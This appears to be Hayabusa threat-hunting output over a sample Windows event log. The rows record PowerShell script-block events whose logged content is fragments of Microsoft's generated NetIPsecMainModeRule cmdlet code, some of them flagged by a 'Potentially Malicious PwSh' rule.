'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"n_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 